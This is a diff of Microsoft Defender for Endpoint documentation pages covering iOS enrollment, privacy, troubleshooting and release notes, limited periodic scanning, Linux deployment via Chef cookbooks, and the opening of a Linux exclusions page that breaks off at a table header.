- - [Set up user enrollment with Company Portal](/mem/intune/enrollment/apple-user-enrollment-with-company-portal)
- - [Set up account driven user enrollment](/mem/intune/enrollment/apple-account-driven-user-enrollment)
-
- 1. Set up SSO Plugin. Authenticator app with SSO extension is a pre-requisite for user enrollment in an iOS device.
- - Create is Device configuration Profile in Intune- Configure iOS/iPadOS Enterprise SSO plug-in with MDM | Microsoft Learn.
- - Ensure to add these two keys in the above configuration:
- - App bundle ID: Include the Defender App bundle ID in this list **com.microsoft.scmx**
- - Additional configuration: Key - **device_registration** ; Type - **String** ; Value- **{{DEVICEREGISTRATION}}**
-
- 1. Set up the MDM Key for User Enrollment.
- - In Intune, go to Go to Apps \> App configuration policies \> Add \> Managed devices
- - Give the policy a name, select Platform \> iOS/iPadOS,
- - Select Microsoft Defender for Endpoint as the target app.
- - In Settings page, select Use configuration designer and add **UserEnrolmentEnabled** as the key, value type as **String**, value as **True**.
-
- 1. Admin can push Defender as a required VPP app from Intune.
-
-### End User
-Defender app is installed into the user's device. User signs in and completes the onboarding. Once the device is successfully onboarded, it will be visible in the Defender Security Portal under Device Inventory.
-
-### Supported features and limitations
- 1. Supported all the current capabilities of MDE iOS like ΓÇô Web protection, Network Protection, Jailbreak detection, Vulnerabilities in OS and Apps, Alerting in Defender Security Portal and Compliance policies.
- 1. Zero touch (silent) deployment and auto onboarding of VPN is not supported with User Enrollment since admins cannot push a device wide VPN profile with User Enrollment.
- 1. For Vulnerability management of apps, only apps in the work profile will be visible.
- 1. Read more on the [User Enrollment limitations and capabilities](/mem/intune/enrollment/ios-user-enrollment-supported-actions#limitations-and-capabilities-not-supported).
--
-## Complete onboarding and check status
-
-1. Once Defender for Endpoint on iOS has been installed on the device, you will see the app icon.
-
- :::image type="icon" source="media/41627a709700c324849bf7e13510c516.png":::
-
-2. Tap the Defender for Endpoint app icon (MSDefender) and follow the on-screen instructions to complete the onboarding steps. The details include end-user acceptance of iOS permissions required by Defender for Endpoint on iOS.
-
-> [!NOTE]
-> Skip this step if you configure zero touch (silent) onboarding. Manually launching application is not necessary if zero touch (silent) onboarding is configured.
-
-3. Upon successful onboarding, the device will start showing up on the Devices list in the Microsoft Defender portal.
-
- :::image type="content" source="media/device-inventory-screen.png" alt-text="The Device inventory page." lightbox="media/device-inventory-screen.png":::
-
-## Next Steps
--- [Configure app protection policy to include Defender for Endpoint risk signals (MAM)](ios-install-unmanaged.md)-- [Configure Defender for Endpoint on iOS features](ios-configure-features.md)
security Ios Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-privacy.md
- Title: Privacy information - Microsoft Defender for Endpoint on iOS-
-description: Describes privacy information for Microsoft Defender for Endpoint on iOS
------- m365-security-- tier3-- mde-ios-- Previously updated : 12/18/2020--
-# Privacy information - Microsoft Defender for Endpoint on iOS
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-> [!NOTE]
-> Defender for Endpoint on iOS uses a VPN to provide the Web Protection feature. This is not a regular VPN and is a local or self-looping VPN that does not take traffic outside the device. **Microsoft or your organization, does not see your browsing activity.**
-
-Defender for Endpoint on iOS collects information from your configured iOS devices and stores it in the same tenant where you have Defender for Endpoint. The information is collected to help keep Defender for Endpoint on iOS secure, up to date, performing as expected, and to support the service.
-
-For more information about data storage, see [Microsoft Defender for Endpoint data storage and privacy](data-storage-privacy.md).
-
-For more information on most common privacy questions about Microsoft Defender for Endpoint on Android and iOS mobile devices, see [Microsoft Defender for Endpoint and your privacy on Android and iOS mobile devices](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-and-your-privacy-on-android-and-ios-mobile-devices-4109bc54-8ec5-4433-9c33-d359b75ac22a).
-
-## Required data
-
-Required data consists of data that is necessary to make Defender for Endpoint on iOS work as expected. This data is essential to the operation of the service and can include data related to the end user, organization, device, and apps.
-
-Here is a list of the types of data being collected:
-
-### Web page or Network information
--- Domain name and IP address of the website only when a malicious connection or web page is detected. Information is collected only when Privacy setting is disabled or turned off.-
-### Device and account information
--- Device information such as date & time, iOS version, CPU info, and Device identifier, where Device identifier is one of the following:
- - Wi-Fi adapter MAC address
- - Randomly generated globally unique identifier (GUID)
-- Tenant, Device, and User information
- - Microsoft Entra Device ID and Azure User ID - Uniquely identifies the device, User respectively at Microsoft Entra ID.
- - Azure tenant ID - GUID that identifies your organization within Microsoft Entra ID.
- - Microsoft Defender for Endpoint org ID - Unique identifier associated with the enterprise that the device belongs to. Allows Microsoft to identify if there are issues affecting a select set of enterprises and the number of enterprises impacted.
- - User Principal Name - Email ID of the user.
-
-### Product and service usage data
-
-The following information is collected only for Microsoft Defender for Endpoint app installed on the device.
--- App package info, including name, version, and app upgrade status.-- Actions done in the app.-- Crash report logs generated by iOS.-- Memory usage data.-
-## Optional Data
-
-Optional data includes diagnostic data and feedback data from the client. Optional diagnostic data is additional data that helps us make product improvements and provides enhanced information to help us detect, diagnose, and fix issues. This data is only for diagnostic purposes and is not required for the service itself.
-
-Optional diagnostic data includes:
--- App, CPU, and network usage for Defender for Endpoint.-- Features configured by the admin for Defender for Endpoint.-
-Feedback Data is collected through in-app feedback provided by the user.
--- The user's email address, if they choose to provide it.-- Feedback type (smile, frown, idea) and any feedback comments submitted by the user.-
-For more information, see [More on Privacy](https://aka.ms/mdatpiosprivacystatement).
security Ios Troubleshoot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-troubleshoot.md
- Title: Troubleshoot issues and find answers on FAQs related to Microsoft Defender for Endpoint on iOS
-description: Troubleshooting and FAQ - Microsoft Defender for Endpoint on iOS
------- m365-security-- tier3-- mde-ios-- Previously updated : 05/15/2021--
-# Troubleshoot issues and find answers to FAQs on Microsoft Defender for Endpoint on iOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!NOTE]
-> **Control Filter not working as expected on Supervised devices**
-Control Filter is not working as expected from iOS 16.1 onwards. This has impacted the Web Protection capability for Supervised devices without local loopback VPN. The issue has been resolved with iOS 16.3. Support for Control Filter is re-enabled with the new version - 1.1.38010102.
-
-
-This topic provides troubleshooting information to help you address issues that may arise as you use Microsoft Defender for Endpoint on iOS.
-
-> [!NOTE]
-> Defender for Endpoint on iOS would use a VPN in order to provide the Web Protection feature. This is not a regular VPN and is a local/self-looping VPN that does not take traffic outside the device.
-
-## Apps don't work when VPN is turned on
-
-There are some apps that stop functioning when an active VPN is detected. You can disable the VPN during the time you're using such apps.
-
-By default, Defender for Endpoint on iOS includes and enables the web protection feature. [Web protection](web-protection-overview.md) helps to secure devices against web threats and protect users from phishing attacks. Defender for Endpoint on iOS uses a VPN in order to provide this protection. Note that this is a local VPN and unlike traditional VPN, network traffic isn't sent outside the device.
-
-While enabled by default, there might be some cases that require you to disable VPN. For example, you want to run some apps that don't work when a VPN is configured. In such cases, you can choose to disable the VPN directly from the Defender for Endpoint app or using the following steps:
-
-1. On your iOS device, open the **Settings** app, click or tap **General** and then **VPN**.
-1. Click or tap the "i" button for Microsoft Defender for Endpoint.
-1. Toggle off **Connect On Demand** to disable VPN.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/ios-vpn-config.png" alt-text="The Connect on demand option" lightbox="media/ios-vpn-config.png":::
-
-> [!NOTE]
-> Web Protection will not be available when VPN is disabled. To re-enable Web Protection, open the Microsoft Defender for Endpoint app on the device and Enable Web Protection.
-
-## Coexistence with multiple VPN profiles
-
-Apple iOS doesn't support multiple **device-wide** VPNs to be active simultaneously. While multiple VPN profiles can exist on the device, only one VPN can be active at a time. If you need to use another VPN on the device, you can disable Defender for Endpoint VPN while you're using the other VPN.
-
-## Battery consumption
-
-In order to provide you all-time protection from web-based threats, Microsoft Defender for Endpoint needs to run in the background at all times. This might lead to a minor increase in overall battery consumption of your device. In case you're seeing significant battery drain, [send us feedback](ios-troubleshoot.md#send-in-app-feedback) and we'll investigate.
-
-Also, in the Settings app, iOS only shows battery usage of apps that are visible to the user for a specific duration of time. The battery usage by apps shown on the screen is only for that time duration and is computed by iOS based on a multitude of factors, including CPU and Network usage. Microsoft Defender for Endpoint uses a local/loop-back VPN in the background to check web traffic for any malicious websites or connections. Network packets from any app go through this check and that causes the battery usage of Microsoft Defender for Endpoint to be computed inaccurately. The actual battery consumption of Microsoft Defender for Endpoint is lesser than what is shown on the Battery Settings page on the device.
-
-Note that the VPN used is a local VPN and unlike a traditional VPN, network traffic isn't sent outside the device.
-
-## Data usage
-
-Microsoft Defender for Endpoint uses a local/loopback VPN to check web traffic for any malicious websites or connections. Due to this reason, Microsoft Defender for Endpoint data usage can be inaccurately accounted for. We've also observed that if the device is on cellular network only, the data usage reported by service provider is very close to the actual consumption whereas in the Settings app, the numbers can be inaccurate.
-
-We've similar observations with other VPN services as well.
-
-In addition, it's critical for Microsoft Defender for Endpoint to be up to date with our backend services to provide better protection.
-
-## Report unsafe site
-
-Phishing websites impersonate trustworthy websites for obtaining your personal or financial information. Visit the [Provide feedback about network protection](https://www.microsoft.com/wdsi/support/report-unsafe-site) page to report a website that could be a phishing site.
-
-## Malicious site detected
-
-Microsoft Defender for Endpoint protects you against phishing or other web-based attacks. If a malicious site is detected, the connection is blocked and an alert is sent to the organization's Microsoft Defender portal. The alert includes the domain name of the connection, remote IP address and the device details.
-
-In addition, a notification is shown on the iOS device. Tapping on the notification opens the following screen for the user to review the details.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/ios-phish-alert.png" alt-text="The site reported as unsafe notification" lightbox="media/ios-phish-alert.png":::
-
-## Device not seen on the Defender for Endpoint console after onboarding
-
-After onboarding, it takes few hours for device to show up in the Device inventory in the Defender for Endpoint security console. Also, ensure that device is registered correctly with Microsoft Entra ID and device has internet connectivity. For successful onboarding, the device has to be registered via Microsoft Authenticator or Intune Company Portal and the user needs to sign-in using the same account with which device is registered with Microsoft Entra ID.
-
-> [!NOTE]
-> Sometimes, the device name is not consistent with that in Microsoft Intune admin center. The device name in Defender for Endpoint console is of the format <username_iPhone/iPad model>. You can also use Microsoft Entra device ID to identify the device in the Defender for Endpoint console.
-
-## Data and Privacy
-
-For details about data collected and privacy, see [Privacy Information - Microsoft Defender for Endpoint on iOS](ios-privacy.md).
-
-## Connectivity issue on cellular network
-
-If you are facing internet connectivity issues on cellular network, check if Microsoft Defender for Endpoint has cellular data enabled: Open Settings app > MS Defender > ensure that "Cellular data" is enabled for MS Defender.
-
-If you still have connectivity issues, check if turning on/off Airplane mode helps resolve the issue. If the issue persists, [send us logs](ios-troubleshoot.md#send-in-app-feedback).
-
-## Issues on supervised devices with content filter profile installed
-
-There's an issue on supervised devices with Defender for Endpoint content filter installed. If you observe slowness or latency in internet connectivity on such devices, uninstall or delete the content filter profile from the device. We're working to resolve this issue and will update this place once we've a resolution.
-
-## Issues during app updates from the app store
-
-By default, apps that are downloaded from the app store are updated automatically.
-
-But if there's an issue, you can update the app manually.
--- On your iOS device, open the App Store.-- Tap on Menu (profile icon) on the top-left corner.-- Scroll to see any pending updates and release notes. Tap **Update** next to an app to update only that app, or tap **Update All**.-
-You can also choose to turn off automatic updates. On your iOS device, open the **Settings** app > go to **App Store** > toggle off **App Updates** to turn off automatic updates.
-
-If you observe issues when the app is updated through the app store (either automatic updates or manual updates), you might need to restart the device. If that doesn't resolve the issue, you can disable the Defender VPN and perform the app update. You can also provide an in-app feedback to report this issue.
-
-## Send in-app feedback
-
-If a user faces an issue which isn't already addressed in the above sections or is unable to resolve using the listed steps, the user can provide in-app feedback along with diagnostic data. Our team will then investigate the logs to provide the right solution. Users can use the following steps to send feedback:
--- Open MSDefender app on the iOS/iPadOS device.-- Tap on Menu (profile icon) on the top-left corner.-- Tap **Send Feedback**.-- Choose from the given options. To report an issue, select **I don't like something**.-- Provide details of the issue that you're facing and check **Send diagnostic data**. We recommend that you include your email address so that the team can contact you for a solution or a follow-up.-- Tap **Submit** to successfully send the feedback.
security Ios Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-whatsnew.md
- Title: What's new in Microsoft Defender for Endpoint on iOS
-description: Learn about the major changes for previous versions of Microsoft Defender for Endpoint on iOS.
---- Previously updated : 03/04/2024---- m365-security-- tier3-- mde-ios----
-# What's new in Microsoft Defender for Endpoint on iOS
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!IMPORTANT]
-> ## Network Protection ΓÇô Update
-> Network protection feature will soon be enabled by default for all users. The update will be rolled out in a phased manner. As a result, users will be able to see Network Protection Card in the Defender app along with App Protection and Web Protection. Users are also required to provide **Local Network** permission. This permission is needed to enhance the existing rogue wifi detection. For more information, see [Network Protection](/microsoft-365/security/defender-endpoint/ios-configure-features#configure-network-protection).
-## Device Tagging
-
-Mobile Device Tagging is now generally available. This feature enables bulk tagging the mobile devices by allowing the admins to set up tags via Intune. Admin can configure the device tags through Intune via configuration policies and push them to user's devices. Once the User installs and activates Defender, the client app passes the device tags to the Security Portal. The Device tags appear against the devices in the Device Inventory. For more information, read [Configure Device Tagging](/microsoft-365/security/defender-endpoint/ios-configure-features#device-tagging).
-
-## Vulnerability assessment of apps
-
-Vulnerability assessment of apps on Microsoft Defender for Endpoint for iOS is now generally available. Defender for Endpoint on iOS supports vulnerability assessments of apps only for enrolled (MDM) devices. For more information, see [Configure vulnerability assessment of apps](/microsoft-365/security/defender-endpoint/ios-configure-features#configure-vulnerability-assessment-of-apps).
-
-## Network protection
-
-Network Protection on Microsoft Defender for Endpoint is now generally available. Network protection provides protection against rogue Wi-Fi related threats, rogue hardware like pineapple devices and notifies the user if a related threat is detected. Users also see a guided experience to connect to secure networks and change networks when they're connected to an unsecure connection.
-
-It includes several admin controls to offer flexibility, such as the ability to configure the feature from within the Microsoft Intune admin center. Admins can also enable privacy controls to configure the data that's sent by Defender for Endpoint from iOS devices. For more information, read [Configure Network Protection](/microsoft-365/security/defender-endpoint/ios-configure-features#configure-network-protection).
-
-## Privacy Controls
-
-Microsoft Defender for Endpoint on iOS enables Privacy Controls for both the Admins and the End Users. This includes the controls for enrolled (MDM) and unenrolled (MAM) devices. Admins can configure the privacy in the phish alert report while End Users can configure the information shared to their organization.
-
-## Optional Permissions and Disable Web Protection
-
-Microsoft Defender for Endpoint on iOS enables **Optional Permissions** in the onboarding flow. Currently the permissions required by MDE are mandatory in the onboarding flow. With this feature, admin can deploy MDE on BYOD devices without enforcing the mandatory **VPN Permission** during onboarding. End Users can onboard the app without the mandatory permissions and can later review these permissions. This feature is currently present only for enrolled devices (MDM).
-
-With **Disable Web Protection**, customers who don't want to set up a VPN can configure to disable **Web Protection** and deploy MDE without that feature. Other MDE features will continue to work. This configuration is available for both the enrolled (MDM) devices and unenrolled (MAM) devices.
-
-## Integration with Tunnel
-
-Microsoft Defender for Endpoint on iOS can now integrate with Microsoft Tunnel, a VPN gateway solution to enable security and connectivity in a single app. Integration with Tunnel provides a simpler, secure VPN experience on iOS with just one app. This feature was earlier available only on Android. For more information, [see the techcommunity post here](https://techcommunity.microsoft.com/t5/microsoft-endpoint-manager-blog/what-s-new-in-microsoft-endpoint-manager-2204-april-edition/ba-p/3297995)
-
-## Improved experience on supervised iOS devices
-
-Microsoft Defender for Endpoint on iOS now has specialized ability on supervised iOS/iPadOS devices, given the increased management capabilities provided by the platform on these types of devices. It can also provide Web Protection **without setting up a local VPN on the device**. This gives end-users a seamless experience while still being protected from phishing and other web-based attacks. For details, visit [this documentation](ios-install.md#complete-deployment-for-supervised-devices)
-
-## Microsoft Defender for Endpoint is now Microsoft Defender in the App store
-
-Microsoft Defender for Endpoint is now available as **Microsoft Defender** in the app store. With this update, the app is available as preview for **Consumers in the US region**. Based on how you log into the app with your work or personal account, you'll have access to features for Microsoft Defender for Endpoint or to features for Microsoft Defender for individuals. For more information, see [this blog](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals).
-
-## Vulnerability Management
-
-On January 25, 2022, we announced the general availability of Vulnerability management on Android and iOS. For more information, see [the techcommunity post here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-general-availability-of-vulnerability-management/ba-p/3071663).
-
-## 1.1.28250101
-- **Integration with Tunnel** - Microsoft Defender for Endpoint on iOS can now integrate with Microsoft Tunnel, a VPN gateway solution to enable security and connectivity in a single app. For more information, see [Microsoft Tunnel Overview](/mem/intune/protect/microsoft-tunnel-overview).-- **Zero-touch onboard for enrolled iOS devices** enrolled through Microsoft Intune is generally available. For more information, see [Zero touch onboarding of Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/ios-install#zero-touch-onboarding-of-microsoft-defender-for-endpoint).-- Bug fixes.-
-## 1.1.24210103
--- Resolved internet connectivity issues on supervised devices. For more information, see [Deploy Defender for Endpoint on enrolled iOS devices](ios-install.md).-- Bug fixes.-
-## 1.1.23250104
--- Performance optimizations - Test battery performance with this version and let us know your feedback.-- **Zero-touch onboard for enrolled iOS devices** - With this version, the preview of Zero-touch onboard for devices enrolled through Microsoft Intune has been added. For more information, see this [documentation](ios-install.md#zero-touch-silent-onboarding-of-microsoft-defender-for-endpoint) for more details on setup and configuration.-- **Privacy Controls** - Configure privacy controls for phish alert report. For more information, see [Configure iOS features](ios-configure-features.md).-
-## 1.1.23010101
--- Bug fixes and performance improvements
- - Performance optimizations were made in this release. Test battery performance with this version and let us know your feedback.
-
-## 1.1.20240103
-- Device Health card - Device Health card notifies end-users about any pending software updates.-- Usability enhancements - End-users can now disable the Defender for Endpoint VPN from the Microsoft Defender app itself. Prior to this update, end-users had to disable VPN only from the Settings app.-- Bug fixes.-
-## 1.1.20020101
-- UX Enhancements - Microsoft Defender for Endpoint has a new look.-- Bug fixes.-
-## 1.1.17240101
-- Support for Mobile Application Management (MAM) via Intune is generally available with this version. For more information, see [Microsoft Defender for Endpoint risk signals available for your App protection policies](https://techcommunity.microsoft.com/t5/intune-customer-success/microsoft-defender-for-endpoint-risk-signals-available-for-your/ba-p/2186322)-- **Jailbreak Detection** is generally available. For more information, see [Setup Conditional Access Policy based on device risk signals](ios-configure-features.md#conditional-access-with-defender-for-endpoint-on-ios).-- **Auto-setup of VPN profile** for enrolled devices via Microsoft Intune is generally available. For more information, see [Auto-Setup VPN profile for enrolled iOS devices](ios-install.md#auto-onboarding-of-vpn-profile-simplified-onboarding).-- Bug fixes.-
-## 1.1.15140101
--- **Jailbreak Detection** is in preview. For more information, see [Setup Conditional Access Policy based on device risk signals](ios-configure-features.md#conditional-access-with-defender-for-endpoint-on-ios).-- **Auto-setup of VPN profile** is in preview for enrolled devices via Microsoft Intune. For more information, see [Auto-Setup VPN profile for enrolled iOS devices](ios-install.md#auto-onboarding-of-vpn-profile-simplified-onboarding).-- The Microsoft Defender ATP product name has now been updated to Microsoft Defender for Endpoint in the app store.-- Improved sign-in experience.-- Bug fixes.-
-## 1.1.15010101
--- With this version, we're announcing support for iPadOS/iPad devices.-- Bug fixes.
security Limited Periodic Scanning Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/limited-periodic-scanning-microsoft-defender-antivirus.md
- Title: Enable the limited periodic Microsoft Defender Antivirus scanning feature
-description: Limited periodic scanning lets you use Microsoft Defender Antivirus in addition to your other installed AV providers
----- Previously updated : 02/18/2024------ m365-security-- tier3-- mde-ngp---
-# Use limited periodic scanning in Microsoft Defender Antivirus
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus--- Microsoft Defender for Individual-
-**Platforms**
-- Windows-
-> [!NOTE]
-> **Microsoft does not support using this feature in Enterprise environments.** This feature only uses a limited subset of the Microsoft Defender Antivirus capabilities to detect malware, and can't detect most malware and potentially unwanted software. Management of the feature is not supported, the feature cannot be enabled or disabled through policies, and reporting capabilities are extremely limited. Microsoft recommends that enterprise organizations choose a primary antivirus/antimalware solution, and use it exclusively.
-
-Limited periodic scanning is a special type of threat detection and remediation that can be enabled when another antivirus product is installed on a Windows 10 or Windows 11 device. It can only be enabled in certain situations. For more information about limited periodic scanning and how Microsoft Defender Antivirus works with other antivirus products, see [Microsoft Defender Antivirus compatibility](microsoft-defender-antivirus-compatibility.md).
-
-## How to enable limited periodic scanning
-
-By default, Microsoft Defender Antivirus enables itself on a Windows 10 or a Windows 11 device if there is no other antivirus product installed, or if the other product is out-of-date, expired, or not working correctly. If Microsoft Defender Antivirus is enabled, the usual options to configure it are available on that device:
--
-If another antivirus product is installed and working correctly, Microsoft Defender Antivirus disables itself. In this case, the Windows Security app changes the **Virus & threat protection** section to show status about the antivirus product, and provides a link to the product's configuration options.
-
-Underneath the name of a non-Microsoft antivirus product, a link appears as **Microsoft Defender Antivirus options**. Select this link to show the toggle that enables limited periodic scanning. Note that the limited periodic option is a toggle to enable or disable periodic scanning. Sliding the switch to **On** shows the standard Microsoft Defender Antivirus options underneath the non-Microsoft antivirus product. The limited periodic scanning option will appear at the bottom of the page.
-
-## Related articles
--- [Configure behavioral, heuristic, and real-time protection](configure-protection-features-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Linux Deploy Defender For Endpoint With Chef https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-deploy-defender-for-endpoint-with-chef.md
- Title: How to Deploy Defender for Endpoint on Linux with Chef
-description: Learn how to deploy Defender for Endpoint on Linux with Chef.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 04/07/2021--
-# Deploy Defender for Endpoint on Linux with Chef
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--
-Before you begin: Install unzip if it's not already installed.
-
-The Chef components are already installed and a Chef repository exists (chef generate repo \<reponame\>) to store the cookbook that's used to deploy to Defender for Endpoint on Chef managed Linux servers.
-
-You can create a new cookbook in your existing repository by running the following command from inside the cookbooks folder that is in your chef repository:
-
-```bash
-chef generate cookbook mdatp
-```
-
-This command creates a new folder structure for the new cookbook called mdatp. You can also use an existing cookbook if you already have one you'd like to use to add the Defender for Endpoint deployment into.
-After the cookbook is created, create a files folder inside the cookbook folder that just got created:
-
-```bash
-mkdir mdatp/files
-```
-
-Transfer the Linux Server Onboarding zip file that can be downloaded from the Microsoft Defender portal to this new files folder.
--
-On the Chef Workstation, navigate to the mdatp/recipes folder. This folder is created when the cookbook was generated. Use your preferred text editor (like vi or nano) to add the following instructions to the end of the default.rb file:
--- include_recipe '::onboard_mdatp'-- include_recipe '::install_mdatp'-
-Then save and close the default.rb file.
-
-Next create a new recipe file named install_mdatp.rb in the recipes folder and add this text to the file:
-
-```powershell
-#Add Microsoft Defender
-Repo
-case node['platform_family']
-when 'debian'
- apt_repository 'MDAPRepo' do
- arch 'amd64'
- cache_rebuild true
- cookbook false
- deb_src false
- key 'BC528686B50D79E339D3721CEB3E94ADBE1229CF'
- keyserver "keyserver.ubuntu.com"
- distribution 'focal'
- repo_name 'microsoft-prod'
- components ['main']
- trusted true
- uri "https://packages.microsoft.com/config/ubuntu/20.04/prod"
- end
- apt_package "mdatp"
-when 'rhel'
- yum_repository 'microsoft-prod' do
- baseurl "https://packages.microsoft.com/config/rhel/7/prod/"
- description "Microsoft Defender for Endpoint"
- enabled true
- gpgcheck true
- gpgkey "https://packages.microsoft.com/keys/microsoft.asc"
- end
- if node['platform_version'] <= 8 then
- yum_package "mdatp"
- else
- dnf_package "mdatp"
- end
-end
-```
-
-You need to modify the version number, distribution, and repo name to match the version you're deploying to and the channel you'd like to deploy.
-Next you should create an onboard_mdatp.rb file in the mdatp/recipies folder. Add the following text to that file:
-
-```powershell
-#Create MDATP Directory
-mdatp = "/etc/opt/microsoft/mdatp"
-zip_path = "/path/to/chef-repo/cookbooks/mdatp/files/WindowsDefenderATPOnboardingPackage.zip"
-
-directory "#{mdatp}" do
- owner 'root'
- group 'root'
- mode 0755
- recursive true
-end
-
-#Extract WindowsDefenderATPOnbaordingPackage.zip into /etc/opt/microsoft/mdatp
-
-bash 'Extract Onboarding Json MDATP' do
- code <<-EOS
- unzip #{zip_path} -d #{mdatp}
- EOS
- not_if { ::File.exist?('/etc/opt/microsoft/mdatp/mdatp_onboard.json') }
-end
-```
-
-Make sure to update the path name to the location of the onboarding file.
-To test deploy it on the Chef workstation, run ``sudo chef-client -z -o mdatp``.
-After your deployment, you should consider creating and deploying a configuration file to the servers based on [Set preferences for Microsoft Defender for Endpoint on Linux](/microsoft-365/security/defender-endpoint/linux-preferences).
-After creating and testing your configuration file, you can put it into the `cookbook/mdatp/files` folder where you also placed the onboarding package. Then you can create a settings_mdatp.rb file in the mdatp/recipies folder and add this text:
-
-```powershell
-#Copy the configuration file
-cookbook_file '/etc/opt/microsoft/mdatp/managed/mdatp_managed.json' do
- source 'mdatp_managed.json'
- owner 'root'
- group 'root'
- mode '0755'
- action :create
-end
-```
-
-To include this step as part of the recipe just add `include_recipe ':: settings_mdatp` to your default.rb file within the recipe folder.
-
-You can also use crontab to schedule automatic updates [Schedule an update of the Microsoft Defender for Endpoint (Linux)](linux-update-MDE-Linux.md).
-
-Uninstall MDATP cookbook:
-
-```powershell
-#Uninstall the Defender package
-case node['platform_family']
-when 'debian'
- apt_package "mdatp" do
- action :remove
- end
-when 'rhel'
- if node['platform_version'] <= 8
-then
- yum_package "mdatp" do
- action :remove
- end
- else
- dnf_package "mdatp" do
- action :remove
- end
- end
-end
-```
security Linux Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-exclusions.md
- Title: Configure and validate exclusions for Microsoft Defender for Endpoint on Linux
-description: Provide and validate exclusions for Microsoft Defender for Endpoint on Linux. Exclusions can be set for files, folders, and processes.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 02/21/2024--
-# Configure and validate exclusions for Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This article provides information on how to define exclusions that apply to on-demand scans, and real-time protection and monitoring.
-
-> [!IMPORTANT]
-> The exclusions described in this article don't apply to other Defender for Endpoint on Linux capabilities, including endpoint detection and response (EDR). Files that you exclude using the methods described in this article can still trigger EDR alerts and other detections. For EDR exclusions, [contact support](/microsoft-365/admin/get-help-support).
-
-You can exclude certain files, folders, processes, and process-opened files from Defender for Endpoint on Linux scans.
-
-Exclusions can be useful to avoid incorrect detections on files or software that are unique or customized to your organization. They can also be useful for mitigating performance issues caused by Defender for Endpoint on Linux.
-
-> [!WARNING]
-> Defining exclusions lowers the protection offered by Defender for Endpoint on Linux. You should always evaluate the risks that are associated with implementing exclusions, and you should only exclude files that you are confident are not malicious.
-
-## Supported exclusion types
-
-The following table shows the exclusion types supported by Defender for Endpoint on Linux.
-
-Exclusion|Definition|Examples
-||
